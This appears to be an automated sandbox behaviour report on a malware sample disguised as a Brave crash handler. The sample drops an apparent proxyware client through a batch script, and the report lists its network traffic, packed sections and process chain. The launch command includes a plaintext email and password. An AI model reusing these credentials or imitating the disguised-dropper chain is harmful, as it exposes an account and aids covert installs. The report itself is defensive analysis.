Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

System Summary

PE file has nameless sections

Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: BraveCrashHandler64.exe	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:
Source: RuntimeBrooker.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe

Process Stats: CPU usage > 49%

Source: RuntimeBrooker.exe.0.dr	Static PE information: Number of sections : 17 > 10
Source: BraveCrashHandler64.exe	Static PE information: Number of sections : 12 > 10

Source: BraveCrashHandler64.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: RuntimeBrooker.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9988533266129033
Source: RuntimeBrooker.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0003235716067864
Source: RuntimeBrooker.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0004044349747474
Source: RuntimeBrooker.exe.0.dr	Static PE information: Section: ZLIB complexity 1.021484375
Source: RuntimeBrooker.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0003137303149607
Source: RuntimeBrooker.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0003164520711143
Source: RuntimeBrooker.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0003610321969696
Source: RuntimeBrooker.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9961219200721154

Source: classification engine

Classification label: mal84.evad.winEXE@484/2@7/1

Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe

File created: C:\Users\user\AppData\Roaming\ip_royal_paws

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	Mutant created: \Sessions\1\BaseNamedObjects\Mutex object: Unique: 2105161706--2021146733. Number: 0
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Mutant created: \Sessions\1\BaseNamedObjects\Mutex object: Unique: -1380170870--472876621. Number: 0
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_03

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe

File created: C:\Users\user~1\AppData\Local\Temp\evb6D7B.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	File opened: C:\Windows\system32\72bd8183439fb4f5767fa1990acf76132161a8f3a1062425ec7bf59a5c958057AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	File opened: C:\Windows\system32\5ce7c405b4fbfd2ce92f0c5731c2c3cd1db90c20d91761f206c4017c2abc5735AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	File opened: C:\Windows\system32\0ff081f765b879b8f69278d3177d4fe0594d36c6eeb586a5db229df4d48586a1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	File opened: C:\Windows\system32\e4908a85610e24675e7166e4b3a5c954545c6c9a83d9fbc969f33722a889de59AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	File opened: C:\Windows\system32\88e9de7df16ef5ede7b8a22f9e46f2db566c0873255741a38ce96b8851ddf0cfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	File opened: C:\Windows\system32\9ef1fde5a6b17f50b7ca6f0c348254d655bb9a8b8d84c3b16759f2d59803b942AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	File opened: C:\Windows\system32\6dbd3109f8a21600fe7a2a2b171dbf07af1ee9149d54c6c04d0e10b2e152d327AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	File opened: C:\Windows\system32\54539802c55156e5b7df30afdf91562fcd4e374b0147b3bf82ec8cb6f05e3b10AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	File opened: C:\Windows\system32\e7baa0f906b5d0d4ca51b1bbe726c1a7c77bfefbbd726042bdfc081643ea0c07AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	File opened: C:\Windows\system32\4f37ce462a7a4184be81029d820c4183f7975ecc4d78dc640a34451201747834AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	File opened: C:\Windows\system32\a96158e41ea9bec469677093f9be28ac3bb11e7518f0aa7b64200f294979ee17AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe

Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\12605RR4.bat" "C:\Users\user\Desktop\BraveCrashHandler64.exe""

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\findstr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\findstr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\findstr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tasklist.exe, 0000000C.00000002.1371960270.000000000071A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 0000001B.00000002.1537922059.0000000002F4B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process;C:\~~

Source: C:\Users\user\Desktop\BraveCrashHandler64.exe

File read: C:\Users\user\Desktop\BraveCrashHandler64.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\BraveCrashHandler64.exe "C:\Users\user\Desktop\BraveCrashHandler64.exe"
Source: C:\Users\user\Desktop\BraveCrashHandler64.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\12605RR4.bat" "C:\Users\user\Desktop\BraveCrashHandler64.exe""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 1252
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"
